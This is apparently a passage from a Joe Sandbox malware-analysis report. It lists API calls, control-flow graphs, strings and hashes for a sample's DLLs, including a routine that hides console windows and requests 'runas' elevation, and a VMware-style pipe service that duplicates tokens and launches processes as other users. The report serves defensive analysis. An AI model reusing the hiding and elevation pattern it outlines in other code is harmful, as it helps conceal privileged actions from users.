                                                    • EnumWindows.USER32(6CF54B70,00000000), ref: 6CF54C00
                                                    • GetConsoleWindow.KERNELBASE(00000000), ref: 6CF54C08
                                                    • ShowWindow.USER32(00000000), ref: 6CF54C0F
                                                    • GetCurrentProcess.KERNEL32(00000008,?), ref: 6CF54C20
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 6CF54C27
                                                    • GetTokenInformation.KERNELBASE(00000004,00000014(TokenIntegrityLevel),?,00000004,?), ref: 6CF54C47
                                                      • Part of subcall function 6CF53970: GetModuleFileNameW.KERNEL32(00000000,?,00000104,69F2C272), ref: 6CF53878
                                                      • Part of subcall function 6CF54A50: ShellExecuteExW.SHELL32 ref: 6CF54ADB
                                                      • Part of subcall function 6CF54A50: WaitForSingleObject.KERNEL32(6CF9C8CD,000000FF), ref: 6CF54AEA
                                                      • Part of subcall function 6CF54A50: CloseHandle.KERNEL32(6CF9C8CD), ref: 6CF54AF3
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 6CF54C5B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CloseProcessTokenWindow$ChangeConsoleCurrentEnumExecuteFileFindHandleInformationModuleNameNotificationObjectOpenShellShowSingleWaitWindows
                                                    • String ID:
                                                    • API String ID: 2167664763-0
                                                    • Opcode ID: cd8aecfe0a7713f2a9ee1587d59319195d6a3e7337856445d8bf8591d9ec3776
                                                    • Instruction ID: fc54ec5e112f6bc6638ac047a40ec1a312fc7a4b849e1d027bb38b15012eec34
                                                    • Opcode Fuzzy Hash: cd8aecfe0a7713f2a9ee1587d59319195d6a3e7337856445d8bf8591d9ec3776
                                                    • Instruction Fuzzy Hash: 0C418D71E10108ABDF04DFA4DC98BAEBBB8EF15704F904119F612A7A90DB349564CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF77B96 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 108 6cf77b96-6cf77ba7 call 6cf78690 111 6cf77ba9-6cf77baf 108->111 112 6cf77bb8-6cf77bbf 108->112 111->112 115 6cf77bb1-6cf77bb3 111->115 113 6cf77bc1-6cf77bc4 112->113 114 6cf77bcb-6cf77bdf dllmain_raw 112->114 113->114 117 6cf77bc6-6cf77bc9 113->117 118 6cf77be5-6cf77bf6 dllmain_crt_dispatch 114->118 119 6cf77c88-6cf77c8f 114->119 116 6cf77c91-6cf77ca0 115->116 120 6cf77bfc-6cf77c01 call 6cf54dd0 117->120 118->119 118->120 119->116 122 6cf77c06-6cf77c0e 120->122 123 6cf77c37-6cf77c39 122->123 124 6cf77c10-6cf77c12 122->124 126 6cf77c40-6cf77c51 dllmain_crt_dispatch 123->126 127 6cf77c3b-6cf77c3e 123->127 124->123 125 6cf77c14-6cf77c32 call 6cf54dd0 call 6cf77ae6 dllmain_raw 124->125 125->123 126->119 128 6cf77c53-6cf77c85 dllmain_raw 126->128 127->119 127->126 128->119
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                    • String ID:
                                                    • API String ID: 3136044242-0
                                                    • Opcode ID: ffff00908930b23fd30195cdb3efe056a8b2aa7f36dbbc23279efc1e41b025db
                                                    • Instruction ID: 19954a33eecfa97bb8a244841ec0ea7a2a35034a11596bf3b8f729a951893569
                                                    • Opcode Fuzzy Hash: ffff00908930b23fd30195cdb3efe056a8b2aa7f36dbbc23279efc1e41b025db
                                                    • Instruction Fuzzy Hash: 0E218072D21618ABDB334F15ED40EAF7A79EB85798B12452BF81457A10C3308D518BF0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF54B70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30stringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 134 6cf54b70-6cf54bab GetClassNameW lstrcmpW 135 6cf54bb5-6cf54bc8 call 6cf775e6 134->135 136 6cf54bad-6cf54baf ShowWindow 134->136 136->135
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000064), ref: 6CF54B91
                                                    • lstrcmpW.KERNELBASE(?,CASCADIA_HOSTING_WINDOW_CLASS), ref: 6CF54BA3
                                                    • ShowWindow.USER32(?,00000000), ref: 6CF54BAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ClassNameShowWindowlstrcmp
                                                    • String ID: <$CASCADIA_HOSTING_WINDOW_CLASS$runas
                                                    • API String ID: 3203229717-3791737310
                                                    • Opcode ID: e688aec2af96c7f6fe51d1d05a2e7ad1e191a634755a07d4a462c3037121bf1b
                                                    • Instruction ID: a0f7adab8a75be8f1089f5e3ca3cdc9bdbe306271e046b101b71aa24aad94b13
                                                    • Opcode Fuzzy Hash: e688aec2af96c7f6fe51d1d05a2e7ad1e191a634755a07d4a462c3037121bf1b
                                                    • Instruction Fuzzy Hash: CEF08271E11118ABDF80DF64CE04FAA77BCEB09304F004196F900D7240EB30AE588BE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF779DF Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • __RTC_Initialize.LIBCMT ref: 6CF77A2C
                                                      • Part of subcall function 6CF77655: InitializeSListHead.KERNEL32(6CFDB330,6CF77A36,6CFB6BA8,00000010,6CF779C7,?,?,?,6CF77BEF,?,00000001,?,?,00000001,?,6CFB6BF0), ref: 6CF7765A
                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CF77A96
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                    • String ID:
                                                    • API String ID: 3231365870-0
                                                    • Opcode ID: d37374a4446aa8d73187fb2df4816bd01904c452e73032c1d88c885ae5f67a04
                                                    • Instruction ID: 9855495e8ba71ed1ba6a0fb091a20af6af3e62e352275cbef777695082fe7c6e
                                                    • Opcode Fuzzy Hash: d37374a4446aa8d73187fb2df4816bd01904c452e73032c1d88c885ae5f67a04
                                                    • Instruction Fuzzy Hash: 1221D4316692025AFF2AAFB4F8007DC33B1DB0632DF34081BD541A6FD1CB22064996B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF8B521 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 182 6cf8b521-6cf8b526 183 6cf8b528-6cf8b540 182->183 184 6cf8b54e-6cf8b557 183->184 185 6cf8b542-6cf8b546 183->185 187 6cf8b569 184->187 188 6cf8b559-6cf8b55c 184->188 185->184 186 6cf8b548-6cf8b54c 185->186 189 6cf8b5c7-6cf8b5cb 186->189 192 6cf8b56b-6cf8b578 GetStdHandle 187->192 190 6cf8b55e-6cf8b563 188->190 191 6cf8b565-6cf8b567 188->191 189->183 193 6cf8b5d1-6cf8b5d4 189->193 190->192 191->192 194 6cf8b57a-6cf8b57c 192->194 195 6cf8b587 192->195 194->195 196 6cf8b57e-6cf8b585 GetFileType 194->196 197 6cf8b589-6cf8b58b 195->197 196->197 198 6cf8b5a9-6cf8b5bb 197->198 199 6cf8b58d-6cf8b596 197->199 198->189 200 6cf8b5bd-6cf8b5c0 198->200 201 6cf8b598-6cf8b59c 199->201 202 6cf8b59e-6cf8b5a1 199->202 200->189 201->189 202->189 203 6cf8b5a3-6cf8b5a7 202->203 203->189
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 6CF8B56D
                                                    • GetFileType.KERNELBASE(00000000), ref: 6CF8B57F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: FileHandleType
                                                    • String ID:
                                                    • API String ID: 3000768030-0
                                                    • Opcode ID: a36941213c3065627ea7cb4c22caced97a753080f81fcb07ba91d3c40e4a2a91
                                                    • Instruction ID: 3836b1357681d2df13afbae0f941467a33e500c3e06dc1886c1f45f9829ec996
                                                    • Opcode Fuzzy Hash: a36941213c3065627ea7cb4c22caced97a753080f81fcb07ba91d3c40e4a2a91
                                                    • Instruction Fuzzy Hash: 4111847260AB5146C7204E3E8C996177EB5AB47738B340F1AE4B58EDF5C330D585C251
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF54DD0 Relevance: 1.5, APIs: 1, Instructions: 14threadCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 204 6cf54dd0-6cf54dd7 205 6cf54dee-6cf54df4 204->205 206 6cf54dd9-6cf54de8 CreateThread 204->206 206->205
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,6CF54BD0,00000000,00000000,00000000), ref: 6CF54DE8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: f35a586fadb7585dd14a4eb3240210976331e2b1e6a42096210bf6572400e607
                                                    • Instruction ID: cb07a57a6e3b70be4fde800b9f72839dcdcde25abfced64bf21fd11680a3c123
                                                    • Opcode Fuzzy Hash: f35a586fadb7585dd14a4eb3240210976331e2b1e6a42096210bf6572400e607
                                                    • Instruction Fuzzy Hash: E4D08C347D430873F6A00A525C0BF08372C6720F18FA08000F7047D9C080E2B4714A1D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 00ED4D00 Relevance: 231.9, APIs: 85, Strings: 47, Instructions: 878stringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 274 ed4d00-ed4d8b call ed84a0 memset * 2 Warning 277 ed4d8d-ed4dba GetLastError Warning * 2 free 274->277 278 ed4dbf-ed4dca 274->278 279 ed5891-ed5898 277->279 280 ed594b-ed5950 call ed85ed 278->280 281 ed4dd0-ed4df6 strncmp 278->281 284 ed589a-ed589c 279->284 285 ed58b4-ed58bd 279->285 282 ed4e5f-ed4e72 strncmp 281->282 283 ed4df8-ed4e1f Warning 281->283 290 ed4f98-ed4fb1 strncmp 282->290 291 ed4e78-ed4e96 call ed3c70 282->291 289 ed4e20-ed4e25 283->289 284->285 292 ed589e-ed58b1 call ed27c0 284->292 287 ed58bf-ed58c0 CloseHandle 285->287 288 ed58c6-ed58c8 285->288 287->288 294 ed5938-ed594a call ed8490 288->294 295 ed58ca-ed58f5 Warning 288->295 289->289 296 ed4e27-ed4e48 Warning 289->296 297 ed4fb7-ed4fe2 call ed3c70 290->297 298 ed5191-ed51aa strncmp 290->298 314 ed4e9c-ed4eb7 DuplicateTokenEx 291->314 315 ed5816 291->315 292->285 302 ed58f8-ed58fd 295->302 303 ed580d 296->303 304 ed4e4e-ed4e5a GetLastError 296->304 297->315 324 ed4fe8-ed5001 strncmp 297->324 308 ed53e6-ed53ff strncmp 298->308 309 ed51b0-ed51da 298->309 302->302 311 ed58ff-ed5920 Warning 302->311 310 ed580f-ed5814 303->310 312 ed539d-ed53b9 Warning free 304->312 316 ed576d-ed5786 strncmp 308->316 317 ed5405-ed5429 call ed3c70 308->317 319 ed51e0-ed51e5 309->319 320 ed5818-ed5833 free 310->320 311->294 321 ed5922-ed5935 GetLastError call ed27c0 311->321 312->279 325 ed4eee-ed4f2f call ed62d0 Warning 314->325 326 ed4eb9-ed4ee9 GetLastError Warning free 314->326 315->320 322 ed578c-ed5799 316->322 323 ed5856-ed588e Warning * 2 free * 2 316->323 317->315 348 ed542f-ed5436 317->348 319->319 328 ed51e7-ed51eb 319->328 329 ed583c-ed583e 320->329 330 ed5835-ed5836 CloseHandle 320->330 321->294 332 ed579b 322->332 333 ed57a6-ed57d5 Warning call ed5c70 322->333 323->279 334 ed5003-ed5008 324->334 335 ed5012-ed502b strncmp 324->335 350 ed4f30-ed4f35 325->350 326->330 338 ed51f1-ed51f9 328->338 339 ed5270-ed527c 328->339 329->279 342 ed5840-ed5855 call ed8490 329->342 330->329 344 ed57a0-ed57a4 332->344 333->315 362 ed57d7-ed57f5 Warning 333->362 334->335 346 ed502d-ed5032 335->346 347 ed5035 335->347 340 ed51fb-ed51fe 338->340 341 ed5211-ed5217 338->341 339->312 340->338 351 ed5200-ed520c 340->351 341->280 352 ed521d-ed526a call ed61b0 341->352 344->333 344->344 346->347 355 ed5038-ed503d 347->355 356 ed543e-ed545d call ed61b0 348->356 357 ed5438-ed543c 348->357 350->350 358 ed4f37-ed4f58 Warning 350->358 351->312 374 ed526c 352->374 375 ed5281-ed5297 GetNamedPipeClientProcessId 352->375 355->355 363 ed503f-ed5086 Warning * 2 call ed1fb0 355->363 372 ed545f-ed5491 Warning free 356->372 373 ed5496-ed549d 356->373 357->356 357->357 358->303 365 ed4f5e-ed4f93 GetLastError Warning call ed6250 free 358->365 362->303 368 ed57f7-ed580a GetLastError call ed27c0 362->368 377 ed508c-ed509e Warning 363->377 378 ed5088-ed508a 363->378 365->330 368->303 372->330 380 ed54a0-ed54a2 373->380 374->339 381 ed52b9-ed52c1 375->381 382 ed5299-ed52b7 GetLastError Warning 375->382 383 ed50f5-ed5140 Warning call ed6ea0 377->383 384 ed50a0-ed50dd free Warning * 3 377->384 378->377 378->383 385 ed54ba-ed54bd 380->385 386 ed54a4-ed54a6 380->386 388 ed53c8-ed53e1 Warning 381->388 389 ed52c7-ed52d4 381->389 387 ed52fc-ed5318 Warning free 382->387 405 ed516f-ed518c free * 2 383->405 406 ed5142-ed516a Warning free CloseHandle 383->406 384->383 390 ed50df-ed50f3 free Warning 384->390 385->380 394 ed54bf-ed5517 Warning 385->394 392 ed54a8-ed54ae 386->392 393 ed54b2-ed54b8 386->393 387->279 388->387 395 ed53be-ed53c3 389->395 396 ed52da-ed52e1 389->396 390->383 392->386 398 ed54b0 392->398 393->385 393->393 399 ed551d-ed5540 Warning 394->399 400 ed562e-ed5637 394->400 395->387 401 ed52ea-ed52f5 396->401 402 ed52e3-ed52e8 396->402 398->385 399->400 407 ed5546-ed5576 Warning 399->407 403 ed5639-ed563a closesocket 400->403 404 ed5640-ed5649 400->404 408 ed531d-ed5360 call ed76e0 Warning 401->408 409 ed52f7 401->409 402->387 403->404 411 ed564b-ed564c closesocket 404->411 412 ed5652-ed565b 404->412 405->330 406->362 407->400 413 ed557c-ed5599 call ed4080 407->413 419 ed5363-ed5368 408->419 409->387 411->412 415 ed565d-ed565e CloseHandle 412->415 416 ed5664-ed566b 412->416 413->400 423 ed559f-ed55e9 Warning * 2 413->423 415->416 420 ed566d-ed5678 GetLastError 416->420 421 ed56b5-ed56dc Warning 416->421 419->419 424 ed536a-ed538b Warning 419->424 425 ed569b 420->425 426 ed567a-ed5699 Warning 420->426 422 ed56e0-ed56e5 421->422 422->422 427 ed56e7-ed56f9 422->427 423->400 428 ed55eb-ed5602 WSADuplicateSocketW 423->428 424->303 429 ed5391-ed5398 GetLastError 424->429 430 ed569d-ed56b0 free 425->430 426->430 431 ed56fb-ed56fc 427->431 432 ed5706-ed5756 htonl memcpy Warning 427->432 428->400 433 ed5604-ed5628 428->433 429->312 430->330 431->432 432->310 434 ed575c-ed5763 GetLastError 432->434 433->400 434->316
                                                    APIs
                                                    • memset.VCRUNTIME140 ref: 00ED4D45
                                                    • memset.VCRUNTIME140(?,00000000,00001000), ref: 00ED4D63
                                                    • Warning.VMWAREBASE(?,?,00000FFF,?,000003E8,?,00000000,00001000), ref: 00ED4D81
                                                    • GetLastError.KERNEL32 ref: 00ED4D8D
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED4D94
                                                    • Warning.VMWAREBASE(?,00000400,transaction on named pipe timeout: %s (%d),00000000,00000000), ref: 00ED4DAB
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000400,transaction on named pipe timeout: %s (%d),00000000,00000000), ref: 00ED4DB1
                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,localconnect,0000000C), ref: 00ED4DE5
                                                    • Warning.VMWAREBASE(?,00001000,%s %d,LOCALCONNECT), ref: 00ED4E0E
                                                    • Warning.VMWAREBASE(?,?,?,?,000003E8), ref: 00ED4E3E
                                                    • GetLastError.KERNEL32 ref: 00ED4E4E
                                                    • Warning.VMWAREBASE(?,00000400,Malformed request from client: %s,?), ref: 00ED53A9
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000400,Malformed request from client: %s,?), ref: 00ED53B0
                                                    • CloseHandle.KERNEL32(?), ref: 00ED58C0
                                                    • Warning.VMWAREBASE(?,00001000,%s %s,ERROR,00000000), ref: 00ED58E7
                                                    • Warning.VMWAREBASE(?,?,?,?,000003E8), ref: 00ED5916
                                                    • GetLastError.KERNEL32 ref: 00ED5922
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$freememset$CloseHandlestrncmp
                                                    • String ID: $ $"%s" -T querytoken %s$%d %d$%d %d %d %d %d %d$%s $%s %d$%s %d %s$%s %s$%s 0x%x$%s VMX was requested, but not present. Using standard VMX.$%s-fd$%s: Denying opensecurable access: pid %d != pid %d$%s: GetNamedPipeClientProcessId failed: %d$Cannot connect to VMX: %s$Debug$ERROR$Error %d while duplicating token.$Error %d while sending ERROR reply$Error %d while sending OK reply$Error %d while sending PID reply$Error %d while sending local connect params reply$LOCALCONNECT$Malformed request from client: %s$OpenSecurable pipe client security check failed$OpenSecurable: FILE_FLAG_DELETE_ON_CLOSE disallowed$OpenSecurable: must open with OPEN_EXISTING$OpenSecurable: must open with share read/write/delete$Process '%s' created with pid %d$Stats$TLOCALCONNECT$TOKEN$Unrecognized command: %s.$VMAUTOMATION$ValidatePipeClientPid$localconnect$opensecurable$openvmautomation$startservice$testAutomation$tlocalconnect$transaction on named pipe timeout: %s (%d)$vmexec$vmexecdebug$vmexecstats$vmware-vmx.exe$|
                                                    • API String ID: 2975413436-463879127
                                                    • Opcode ID: ebddd39d7bbba3807b09a717bdced5f7a8e93d45f7e06415138d8797ba07b374
                                                    • Instruction ID: c53ea5a1e339d9bb95f5b6f03f2ab4bd8fb0632fca2b267ddf86690e219c542c
                                                    • Opcode Fuzzy Hash: ebddd39d7bbba3807b09a717bdced5f7a8e93d45f7e06415138d8797ba07b374
                                                    • Instruction Fuzzy Hash: 2862F5B2900718AEDB219B649D45FEA73BCEB04704F0451E7FA09B6382EB719B468F51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED6EA0 Relevance: 173.8, APIs: 75, Strings: 24, Instructions: 520memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 435 ed6ea0-ed6f39 memset 436 ed6f40-ed6f4d EnterCriticalSection 435->436 436->436 437 ed6f4f-ed6f60 436->437 438 ed6f65-ed6f67 437->438 439 ed6f6d-ed6fa8 EnterCriticalSection memcpy LeaveCriticalSection 438->439 440 ed708a-ed708f 438->440 442 ed6fae 439->442 443 ed7058 439->443 441 ed7094-ed70a1 LeaveCriticalSection 440->441 441->441 445 ed70a3-ed70ab 441->445 446 ed6fb0-ed6fe5 GetTokenInformation 442->446 444 ed705e-ed7084 443->444 444->438 444->440 447 ed70ad-ed70c0 Warning 445->447 448 ed70d2-ed70f4 Warning call ed6810 445->448 449 ed7005-ed7033 GetTokenInformation 446->449 450 ed6fe7-ed7003 GetLastError Warning 446->450 453 ed7132-ed7161 DuplicateTokenEx 447->453 462 ed7126-ed712c 448->462 463 ed70f6-ed7121 call ed27c0 free * 2 448->463 449->450 452 ed7035-ed7049 EqualSid 449->452 451 ed704b-ed7052 450->451 451->443 451->446 452->451 455 ed70c2-ed70d0 452->455 456 ed718e-ed71e9 AllocateAndInitializeSid 453->456 457 ed7163-ed7189 GetLastError call ed27c0 free * 2 453->457 455->444 460 ed71eb-ed7204 GetLastError Warning 456->460 461 ed7206-ed7230 SetTokenInformation 456->461 469 ed75c8-ed75e6 Warning 457->469 465 ed724f-ed7257 460->465 466 ed724d 461->466 467 ed7232-ed724b GetLastError Warning 461->467 462->453 463->469 470 ed7259-ed725a FreeSid 465->470 471 ed7260-ed7262 465->471 466->465 467->465 473 ed75e8-ed75ee call ed6e20 469->473 474 ed75f1-ed75f8 469->474 470->471 475 ed7288-ed729b Warning 471->475 476 ed7264-ed7283 call ed27c0 free * 2 471->476 473->474 480 ed761e-ed7625 474->480 481 ed75fa-ed7614 TerminateProcess CloseHandle 474->481 477 ed729d-ed72b9 GetLastError call ed27c0 free 475->477 478 ed72be-ed72cc ImpersonateLoggedOnUser 475->478 476->469 496 ed75bf-ed75c5 free 477->496 485 ed72ce-ed72e1 GetLastError call ed27c0 478->485 486 ed72e7-ed72fa Warning 478->486 487 ed763d-ed7648 480->487 488 ed7627-ed7633 CloseHandle 480->488 481->480 485->486 494 ed731d-ed732a _stricmp 486->494 495 ed72fc-ed7318 GetLastError call ed27c0 free 486->495 492 ed764a-ed764b CloseHandle 487->492 493 ed7651-ed7658 487->493 488->487 492->493 498 ed767c-ed768b call ed8490 493->498 499 ed765a-ed767b call ed8490 493->499 501 ed732c-ed734a call ed27c0 free * 2 494->501 502 ed734f-ed73c2 Warning * 2 CreateProcessAsUserW free * 2 494->502 495->496 496->469 501->469 503 ed73c8-ed73dc call ed6e80 GlobalMemoryStatusEx 502->503 504 ed7494-ed74a4 GetLastError call ed6e80 502->504 518 ed740c-ed7433 SetProcessWorkingSetSize 503->518 519 ed73de-ed73e5 GetLastError 503->519 516 ed759e-ed75b9 call ed27c0 free 504->516 517 ed74aa-ed74ad 504->517 516->496 517->516 520 ed74b3-ed74e8 call ed27c0 GetCurrentProcess IsWow64Process 517->520 522 ed7435-ed7441 GetLastError 518->522 523 ed7443-ed748f ResumeThread CloseHandle call ed6be0 free * 2 518->523 521 ed73ea-ed7407 call ed27c0 free * 2 519->521 532 